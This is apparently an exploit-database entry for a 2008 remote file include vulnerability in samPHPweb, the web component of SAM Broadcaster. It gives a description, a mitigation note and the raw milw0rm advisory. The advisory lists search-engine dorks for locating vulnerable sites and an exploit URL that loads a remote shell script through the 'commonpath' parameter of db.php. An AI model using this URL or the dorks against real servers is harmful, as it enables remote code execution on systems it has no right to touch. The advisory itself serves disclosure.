header-logo
Suggest Exploit
vendor:
SAM Broadcaster
by:
Crackers_Child
8.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: SAM Broadcaster
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2008

samPHPweb Remote File Include Vulnerability

A remote file include vulnerability exists in samPHPweb, which allows an attacker to include a remote file on the affected server. This vulnerability is due to insufficient sanitization of user-supplied input to the 'commonpath' parameter in the 'db.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request containing a URL-encoded PHP script in the 'commonpath' parameter. This will cause the remote file to be included and executed on the affected server, allowing the attacker to execute arbitrary code on the affected server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to apply the patch immediately.
Source

Exploit-DB raw data:

+______________________________________________By Crackers_Child___________________________________________+

*
*
*    [~] Script.......:       samPHPweb
*    [~] Page.........:       http://support.spacialaudio.com/forums/viewforum.php?f=22  & http://www.spacialaudio.com/
*    [~] Author.......:       Crackers_Child  | cybermilitan@hotmail.com & localexploit@hotmail.com
*    [~] Class........:       Remote File Ä°nclude Vulnerability
*    [~] Dork.........:       This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions, LLC 1999 - 2004.
*    [~] Dork.........:       This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions
*    [~] Dork.........:       This page was produced using SAM2 (Streaming Audio Manager)
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
*
*
*     
*
*       [~] Exploit Rfi...:     http://[Taget]/[Path]/common/db.php?commonpath=sh3lz?
*
*                             
+_______________________________________________________________________________________________________________________+



        [~] Ä°nfo......: Can Yakar . . .
                      



+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
*
*
*       [~] Special Thanx.......:    str0ke, BiyoSecurity.Net, SiberSavascilar.com And All F3ckers :)
*
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2008-01-04]

Navigation

Suggest Exploit

Services By CQR